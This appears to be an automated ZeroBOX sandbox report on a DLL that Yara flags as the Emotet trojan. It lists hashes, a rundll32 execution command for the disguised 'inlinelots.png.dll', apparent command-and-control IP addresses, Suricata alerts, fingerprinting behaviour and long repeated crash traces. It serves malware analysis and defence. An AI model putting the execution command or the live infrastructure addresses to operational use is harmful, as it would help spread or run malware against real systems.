Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 23, 2021, 5:15 p.m.	Sept. 23, 2021, 5:25 p.m.

Size	520.0KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`dd37687f508cb88b08f932fae1e2a767`
SHA256	`e92330964ca276210c85dc0a0637b38e0233360e244d8768497a032993a429ab`
CRC32	`558B38DA`
ssdeep	`6144:tIl3f5on8R0CBtsabvbV0iRugpw8mI3R5y4MAIJ+CczfBsx2X/HSpu9SiWaKMVe1:tk32q0CB5lwq6cBsxsPUmYa1B3js`
Yara	Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_1_Zero - Win32 Trojan Emotet OS_Processor_Check_Zero - OS Processor Check IsDLL - (no description) Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\inlinelots.png.dll,runquery
2972
- wermgr.exe C:\Windows\system32\wermgr.exe
  1836
  - svchost.exe C:\Windows\system32\svchost.exe
    1016
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\inlinelots.png.dll,
2072

Name	Response	Post-Analysis Lookup
ident.me	A 176.58.123.25	176.58.123.25

IP Address	Status	Action
105.27.205.34	Active	Moloch
128.201.76.252	Active	Moloch
164.124.101.2	Active	Moloch
176.58.123.25	Active	Moloch
181.129.167.82	Active	Moloch
185.56.175.122	Active	Moloch
221.147.172.5	Active	Moloch
43.252.158.104	Active	Moloch
60.51.47.65	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49206 -> 43.252.158.104:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49203 -> 181.129.167.82:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49213 -> 128.201.76.252:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49204 -> 176.58.123.25:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 181.129.167.82:443 -> 192.168.56.101:49203	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 128.201.76.252:443 -> 192.168.56.101:49213	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49214 -> 105.27.205.34:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 43.252.158.104:443 -> 192.168.56.101:49206	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 105.27.205.34:443 -> 192.168.56.101:49214	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 176.58.123.25:443 -> 192.168.56.101:49204	2026743	ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49203 181.129.167.82:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49213 128.201.76.252:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49204 176.58.123.25:443	C=US, O=Let's Encrypt, CN=R3	CN=ident.me	4a:7a:fd:e5:e5:1c:ed:4c:db:91:6f:7a:61:c6:35:8a:4a:6d:89:d7
TLSv1 192.168.56.101:49206 43.252.158.104:443	C=US, ST=IL, O=Internet Widgits Pty Ltd	C=US, ST=IL, O=Internet Widgits Pty Ltd	92:9c:54:61:4b:3c:f9:b4:92:51:95:d0:aa:d5:6b:b5:51:ab:1d:47
TLSv1 192.168.56.101:49214 105.27.205.34:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 23, 2021, 5:15 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 23, 2021, 5:15 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 23, 2021, 5:15 p.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd hook_in_monitor+0x45 lde-0x133 @ 0x744142ea New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x7442f7f3 GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefd6d4190 SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef9f6eb99 SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef9f6ec23 WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef9f63fe7 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 5669421 registers.r15: 5549421 registers.rcx: 0 registers.rsi: 854145984 registers.r10: 0 registers.rbx: 0 registers.rsp: 2155920 registers.r11: 0 registers.r8: 5 registers.r9: 1951127552 registers.rdx: 2 registers.r12: 3723008 registers.rbp: 0 registers.rdi: 0 registers.rax: 1 registers.r13: 443	1	0	0
__exception__ Sept. 23, 2021, 5:16 p.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd hook_in_monitor+0x45 lde-0x133 @ 0x744142ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7442fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1 0x9333c exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 854142240 registers.r15: 854147360 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 2151496 registers.r11: -125 registers.r8: 3 registers.r9: 1951132416 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 2151888 registers.rax: 4 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 23, 2021, 5:15 p.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
hook_in_monitor+0x45 lde-0x133 @ 0x744142ea
New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x7442f7f3
GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefd6d4190
SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef9f6eb99
SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef9f6ec23
WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef9f63fe7

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 5669421
registers.r15: 5549421
registers.rcx: 0
registers.rsi: 854145984
registers.r10: 0
registers.rbx: 0
registers.rsp: 2155920
registers.r11: 0
registers.r8: 5
registers.r9: 1951127552
registers.rdx: 2
registers.r12: 3723008
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 443

__exception__

Sept. 23, 2021, 5:16 p.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
